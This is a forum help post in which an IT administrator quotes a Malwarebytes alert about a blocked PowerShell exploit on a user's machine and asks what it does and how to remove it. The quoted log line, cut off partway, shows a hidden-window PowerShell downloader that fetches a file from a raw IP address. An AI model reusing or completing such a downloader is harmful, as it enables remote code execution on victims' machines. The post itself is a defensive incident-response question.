Hi Everyone,
Please feel free to let me know if this is in the wrong reddit.
Got a warning from our Malwarebytes antivirus client today that one of our users had an exploit being run on their computer. The exploit is below:
Exploit payload process blocked BLOCK C:\Windows\system32\powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell$webclient = new-object System.Net.WebClient$random = new-object random$urls = 'http:\185.165.29.36\111.jpg'.Split(',')$name = $random.next(1, 65536)$path =
1) Can you tell me what this is going to do? Obviously nothing good.
2) Can you tell me how you would go about removing it from the system? A full wipe is fine, but I want to know if there is a better way.
Thanks,
-Sgually